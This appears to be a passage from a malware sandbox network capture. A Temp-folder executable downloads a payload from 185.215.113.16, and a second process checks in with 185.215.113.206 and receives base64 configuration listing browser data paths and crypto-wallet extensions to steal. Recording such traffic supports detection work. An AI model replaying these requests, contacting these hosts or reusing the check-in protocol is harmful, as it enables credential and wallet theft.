                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620341063 CET328INData Raw: be 2e 0a 21 bf 90 45 b2 dd 2d 8f e2 ae 8b 49 65 7a f9 4d 65 7a f9 4d 65 7a f9 4d 65 7a b2 49 cd d6 b8 d1 58 3d ed 19 5c be 2e 0a 21 bf b2 52 cd 96 b0 e2 20 d3 10 e3 25 83 be a8 20 d4 32 69 5d 2f 50 0a a8 ef 31 0b f1 c2 b8 ba 28 38 7d 12 a8 f7 35
                                                                                                                                                                                                                                                  Data Ascii: .!E-IezMezMezMezIX=\.!R % 2i]/P1(8}5j0$D>&&]/P]/P1(8~5a0MezWJ L4-Uv6-i6PIL!/p*J h4-Uf6-i56PI;L!/pJ ]
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620800972 CET1236INData Raw: 76 ba a8 20 57 49 fd 20 bf 57 0e c9 9e 4b c9 20 d7 1d fc df be 90 c5 a2 dd 2d 32 1b aa 2d 0a c7 b5 55 ca 32 fe 2d b2 e4 a8 70 0a 80 e2 b7 a8 20 57 dd fb 20 bf 57 07 c9 e6 4b c9 20 d7 4d fc df be 90 b9 a6 dd 2d 32 77 a8 2d 0a a0 82 75 b0 2c d7 55
                                                                                                                                                                                                                                                  Data Ascii: v WI WK -2-U2-p W WK M-2w-u,UU3-iY4PIK!?pK p3-'UN3-i6PI3K!:xpVK 2-$U4-i;PIK!68pL 2-]WL q1-2-U3-


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.450064185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:47.812678099 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 30 37 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1010747001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.281053066 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.283431053 CET55OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506701946 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:47 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 3277824
                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Jan 2025 08:35:47 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6777a163-320400"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 10 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf2@@2"3@Wk11 @.rsrc@.idata @xsrqoxbvP+F+@frrbcldo21@.taggant02"1@
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506747007 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506757021 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506774902 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506786108 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506799936 CET1236INData Raw: 4b b2 c0 b1 74 12 e9 77 33 56 0a 2f 2c 4e 22 62 67 f2 bb a9 df 73 bc b1 94 73 47 8e 60 d8 8f 29 2f b5 c0 b1 74 16 f0 77 33 56 2a 2f 2c 4e 22 c2 60 f2 bb a9 3f 70 bc b1 94 73 47 8e 60 d8 83 29 d7 b5 c0 b1 74 62 ee 77 33 56 ca 2e 2c 4e 22 a2 60 f2
                                                                                                                                                                                                                                                  Data Ascii: Ktw3V/,N"bgssG`)/tw3V*/,N"`?psG`)tbw3V.,N"`psG`)tw3V.,N"`psG`)tw3V.,N"a_psG`)tw3V.,N"BapsG`)t2w3VJ.,N""apsG`)tw3Vj.,N"b
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506818056 CET1236INData Raw: 9f 8c bc b1 94 73 47 8e 60 d8 bf 29 a3 b4 c0 b1 74 ea e5 77 33 56 6a 2a 2c 4e 22 82 16 f2 bb a9 ff 8c bc b1 94 73 47 8e 60 d8 bf 29 5b b4 c0 b1 74 ca ef 77 33 56 0a 2a 2c 4e 22 62 16 f2 bb a9 df 8c bc b1 94 73 47 8e 60 d8 83 29 53 b4 c0 b1 74 8a
                                                                                                                                                                                                                                                  Data Ascii: sG`)tw3Vj*,N"sG`)[tw3V*,N"bsG`)Stw3V**,N"?sG`)Gtw3V),N"sG`)tw3V),N"sG`)ktw3V),N"_sG`)tw3V),N"BsG`)7tb
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506884098 CET552INData Raw: 33 56 aa 15 2c 4e 22 42 04 f2 bb a9 bf 89 bc b1 94 73 47 8e 60 d8 87 29 6f b8 c0 b1 74 32 ee 77 33 56 4a 15 2c 4e 22 22 04 f2 bb a9 9f 89 bc b1 94 73 47 8e 60 d8 83 29 1f b8 c0 b1 74 ca ec 77 33 56 6a 15 2c 4e 22 82 05 f2 bb a9 ff 89 bc b1 94 73
                                                                                                                                                                                                                                                  Data Ascii: 3V,N"BsG`)ot2w3VJ,N""sG`)tw3Vj,N"sG`)tw3V,N"bsG`)+tJw3V*,N"?sG`)tw3V,N"sG`)t*w3V,N"sG`)tzw3V,N"_sG
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506895065 CET1236INData Raw: 02 f2 bb a9 9f 87 bc b1 94 73 47 8e 60 d8 87 29 ff ba c0 b1 74 5a e8 77 33 56 6a 13 2c 4e 22 82 03 f2 bb a9 ff 87 bc b1 94 73 47 8e 60 d8 87 29 ef ba c0 b1 74 02 eb 77 33 56 0a 13 2c 4e 22 62 03 f2 bb a9 df 87 bc b1 94 73 47 8e 60 d8 83 29 9f ba
                                                                                                                                                                                                                                                  Data Ascii: sG`)tZw3Vj,N"sG`)tw3V,N"bsG`)t:w3V*,N"<?sG`)tw3V,N"<sG`)tw3V,N"<sG`)Ctzw3V,N"=_sG`){tZw3V,N"B=sG`)
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506911039 CET224INData Raw: 19 f1 bf 88 ed 32 ca 32 e8 4e 41 b3 bf 34 ff b1 6e 7a 47 8e 60 7a 47 8e 60 e1 a3 93 5d 31 ba 1a 6e 7a 47 8e 60 7a 47 8e 60 e5 06 ae 9a 4f 30 4a a6 41 d1 a9 24 a1 bc b1 ae 72 83 cc 6a ec d8 f3 28 4e 46 8e 60 7a 47 8e 60 e5 06 ae 9a bb 30 4a 22 e7
                                                                                                                                                                                                                                                  Data Ascii: 22NA4nzG`zG`]1nzG`zG`O0JA$rj(NF`zG`0J"{?PHH3\14o6~`zG`zG`zG`O#ZLN3Fdhw?3N6Aw7N3\1`zG`zG`zG`ZBd2O*/N3zG`A
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:48.506921053 CET1236INData Raw: 9a 8e 08 08 2f fe 42 48 5f 35 ff b1 89 3f 50 b2 a6 f5 83 34 73 32 ca a9 00 23 bd b1 ae 72 83 88 2a c2 81 76 33 bb 41 10 90 70 bf b1 67 7a 47 8e 60 7a 47 8e 60 7a 47 8e 60 e5 06 ae 9a bb ac 41 9a 8e 08 08 2f fe 42 48 5f 35 ff b1 89 3f 50 b2 a6 f5
                                                                                                                                                                                                                                                  Data Ascii: /BH_5?P4s2#r*v3ApgzG`zG`zG`A/BH_5?P4s2@#r*v3ApgzG`zG`zG`4bOwAl&^6&$b2nzG`zG`z(NF`zG`zG`Z.uw7IA?i?k4N"d#


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.450065185.215.113.206806704C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:50.721493006 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.431665897 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:51 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.433986902 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCG
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 211
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 35 35 37 36 44 46 41 33 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="hwid"8E5576DFA3442409657292------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="build"stok------FBFHJJJDAFBKEBGDGHCG--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.674547911 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:51 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 180
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 59 6a 45 78 59 6a 67 31 4e 54 52 6d 5a 57 5a 6c 4d 44 52 6c 5a 44 52 68 4e 6d 55 33 4e 6d 51 78 4f 44 59 32 5a 47 4d 34 4d 57 5a 6b 5a 44 46 68 5a 54 68 6c 59 32 59 78 59 54 67 7a 59 54 56 68 59 6a 4d 35 4e 47 4e 68 4d 57 59 77 59 54 5a 68 4d 6a 55 33 4d 7a 51 35 59 54 4d 79 4e 44 63 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                  Data Ascii: YjExYjg1NTRmZWZlMDRlZDRhNmU3NmQxODY2ZGM4MWZkZDFhZThlY2YxYTgzYTVhYjM5NGNhMWYwYTZhMjU3MzQ5YTMyNDc3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.684118986 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 268
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="message"browsers------AKJEGCFBGDHJJJJJKJEC--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.910284996 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:51 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 2028
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.910300970 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                  Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.933449984 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="message"plugins------IIJDBAKKKFBFHIDGIIEH--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.159775019 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:52 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 7116
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
